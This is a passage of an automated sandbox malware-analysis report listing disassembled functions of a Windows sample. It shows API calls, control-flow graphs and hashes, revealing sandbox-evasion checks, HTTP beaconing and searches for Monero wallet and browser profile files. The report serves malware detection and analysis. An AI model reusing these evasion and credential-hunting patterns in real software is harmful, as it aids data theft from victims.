                        • Instruction Fuzzy Hash: 9C312D71941208ABDB18F7F0DC56BEE7738AF44750F504528F212A21C2DF796985E7A2
                        Function 00F16AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1436 f16af3 1437 f16b0a 1436->1437 1439 f16aba-f16ad7 call f1aad0 OpenEventA 1437->1439 1440 f16b0c-f16b22 call f16920 call f15b10 CloseHandle ExitProcess 1437->1440 1446 f16af5-f16b04 CloseHandle Sleep 1439->1446 1447 f16ad9-f16af1 call f1aad0 CreateEventA 1439->1447 1446->1437 1447->1440
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008A9830,?,00F2110C,?,00000000,?,00F21110,?,00000000,00F20AEF), ref: 00F16ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F16AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00F16AF9
                        • Sleep.KERNEL32(00001770), ref: 00F16B04
                        • CloseHandle.KERNEL32(?,00000000,?,008A9830,?,00F2110C,?,00000000,?,00F21110,?,00000000,00F20AEF), ref: 00F16B1A
                        • ExitProcess.KERNEL32 ref: 00F16B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: 0f8f7e4e3cbf337888b888c9021946b38d761d5566bd7ce9b8b82241ec07bae2
                        • Instruction ID: eae0dd6626b61cd259ef6587a46d4cac9b579b612299f9753a622ed9dfe98539
                        • Opcode Fuzzy Hash: 0f8f7e4e3cbf337888b888c9021946b38d761d5566bd7ce9b8b82241ec07bae2
                        • Instruction Fuzzy Hash: 87F03A34A84209EBE724EBA0AC16BFD7B34EF44B42F104524B523E2181CBB955C0E655
                        Function 00F047B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F04839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00F04849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 05f540f54887a3b45cc34f7c039a1e4586823449d6d03d678a684d0bc4845f5a
                        • Instruction ID: 08624c374fb445a729d5b82e9f78c9f17dfb3adab4a21a313e02917e2a2d14eb
                        • Opcode Fuzzy Hash: 05f540f54887a3b45cc34f7c039a1e4586823449d6d03d678a684d0bc4845f5a
                        • Instruction Fuzzy Hash: A4215EB1D00208ABDF14DFA4EC45ADD7B78FF04320F108225F925A72C0DB746A0ADB91
                        Function 00F151F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F06280: InternetOpenA.WININET(00F20DFE,00000001,00000000,00000000,00000000), ref: 00F062E1
                          • Part of subcall function 00F06280: StrCmpCA.SHLWAPI(?,008AF278), ref: 00F06303
                          • Part of subcall function 00F06280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F06335
                          • Part of subcall function 00F06280: HttpOpenRequestA.WININET(00000000,GET,?,008AE690,00000000,00000000,00400100,00000000), ref: 00F06385
                          • Part of subcall function 00F06280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F063BF
                          • Part of subcall function 00F06280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F063D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F15228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 704c1eed7d13c92abb4adfc34005fd518e032b8e0c1ba0ceb12e294733455a4c
                        • Instruction ID: a762908a9a0adfb7c53f446844bffd56b30600bc45afb4874c6dc0ba642af2ed
                        • Opcode Fuzzy Hash: 704c1eed7d13c92abb4adfc34005fd518e032b8e0c1ba0ceb12e294733455a4c
                        • Instruction Fuzzy Hash: B1113031901048EBCB14FF60DD52AED7338AF50310F404158F81A4B1D2EF39AB96E692
                        Function 00F01220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1493 f01220-f01247 call f189b0 GlobalMemoryStatusEx 1496 f01273-f0127a 1493->1496 1497 f01249-f01271 call f1da00 * 2 1493->1497 1499 f01281-f01285 1496->1499 1497->1499 1501 f01287 1499->1501 1502 f0129a-f0129d 1499->1502 1504 f01292-f01294 ExitProcess 1501->1504 1505 f01289-f01290 1501->1505 1505->1502 1505->1504
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F0123E
                        • ExitProcess.KERNEL32 ref: 00F01294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 803317263-2766056989
                        • Opcode ID: b3e07cf0ac6e9b9d3e4d5d36083b8accf5b7aa57e3e9f90982b122e614f4a9d6
                        • Instruction ID: d2361d2b0f36ae46bfb56a5dbf8d79bd097a7ad51383d100f67b3b964cec0921
                        • Opcode Fuzzy Hash: b3e07cf0ac6e9b9d3e4d5d36083b8accf5b7aa57e3e9f90982b122e614f4a9d6
                        • Instruction Fuzzy Hash: 9501FBB0D84308BBEB20DBE4DC49B9EBB78BF14B05F208058E705B72C1D6795585A799
                        Function 00F01110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F0112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00F01132
                        • ExitProcess.KERNEL32 ref: 00F01143
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: 018a92a2d4916199c612867363ea9a8938a001d71111c99616ce2031866ef40f
                        • Instruction ID: da24382900eec6adb7f8d78b1fb4436dfe22ff50c1512d21bded57fe74ea21b9
                        • Opcode Fuzzy Hash: 018a92a2d4916199c612867363ea9a8938a001d71111c99616ce2031866ef40f
                        • Instruction Fuzzy Hash: 90E0E674985308FBF724ABA0AC1AB09767CEF04F16F504154F70A771C4D6B52641A799
                        Function 00F010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00F010B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00F010F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: 722e1dbea44e363dad2f52642c20e3a1b3e98762bbbd08a7ffaecc3c72b1ce05
                        • Instruction ID: 88bc1e0c12ee12ec50c669b909d443bf00a50cdcde140aa18e2658f45b7cdf3c
                        • Opcode Fuzzy Hash: 722e1dbea44e363dad2f52642c20e3a1b3e98762bbbd08a7ffaecc3c72b1ce05
                        • Instruction Fuzzy Hash: A1F0E971A81208BBE71497A4AC59FAAB7D8E705B25F300458F545E3280D5715E40EB50
                        Function 00F01190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F17910
                          • Part of subcall function 00F178E0: RtlAllocateHeap.NTDLL(00000000), ref: 00F17917
                          • Part of subcall function 00F178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00F1792F
                          • Part of subcall function 00F17850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F011B7), ref: 00F17880
                          • Part of subcall function 00F17850: RtlAllocateHeap.NTDLL(00000000), ref: 00F17887
                          • Part of subcall function 00F17850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F1789F
                        • ExitProcess.KERNEL32 ref: 00F011C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: 6cd76f307c8feb7a460db587f005320d3ac3366c3814cd8b5abc6c10fb26706c
                        • Instruction ID: 3e1b368f43cdfe3de053a21520cfbdadbc7d0205d0e99aa0bc06c1bb5b6614e3
                        • Opcode Fuzzy Hash: 6cd76f307c8feb7a460db587f005320d3ac3366c3814cd8b5abc6c10fb26706c
                        • Instruction Fuzzy Hash: A8E012B9D9430163DA2873B0BD0AB6A329C6F14796F140434FA0ED3142FE2DF881B6A5

                        Non-executed Functions

                        Function 00F138B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 00F138CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 00F138E3
                        • lstrcat.KERNEL32(?,?), ref: 00F13935
                        • StrCmpCA.SHLWAPI(?,00F20F70), ref: 00F13947
                        • StrCmpCA.SHLWAPI(?,00F20F74), ref: 00F1395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F13C67
                        • FindClose.KERNEL32(000000FF), ref: 00F13C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: 759289e7f8c255034cd2ad17f28347396dcb7f9cc41a2bbbb97019abeeb56b14
                        • Instruction ID: 75ee75adae084e0edeec270080c132f04ec0fa3118f395e0e84b8bcb873ded97
                        • Opcode Fuzzy Hash: 759289e7f8c255034cd2ad17f28347396dcb7f9cc41a2bbbb97019abeeb56b14
                        • Instruction Fuzzy Hash: 72A190B6A402189BDB34DBA4DC84FEA7378FF44700F044598B61E96185EB749BC4DFA2
                        Function 00F0BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • FindFirstFileA.KERNEL32(00000000,?,00F20B32,00F20B2B,00000000,?,?,?,00F213F4,00F20B2A), ref: 00F0BEF5
                        • StrCmpCA.SHLWAPI(?,00F213F8), ref: 00F0BF4D
                        • StrCmpCA.SHLWAPI(?,00F213FC), ref: 00F0BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F0C7BF
                        • FindClose.KERNEL32(000000FF), ref: 00F0C7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 73c34c400330681621c73d713f676f10c555cdd01493660870c96eee6cc0dd5f
                        • Instruction ID: 80456f60d5d20b5472f2a7cd69fbc23543b2caa4c5bc3a447bcf6a1fa33818d3
                        • Opcode Fuzzy Hash: 73c34c400330681621c73d713f676f10c555cdd01493660870c96eee6cc0dd5f
                        • Instruction Fuzzy Hash: 234253729111089BDB14FB70DD96EED737DAF94310F404568B90A970C1EF389B8AEB92
                        Function 00F14910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 00F1492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00F14943
                        • StrCmpCA.SHLWAPI(?,00F20FDC), ref: 00F14971
                        • StrCmpCA.SHLWAPI(?,00F20FE0), ref: 00F14987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F14B7D
                        • FindClose.KERNEL32(000000FF), ref: 00F14B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
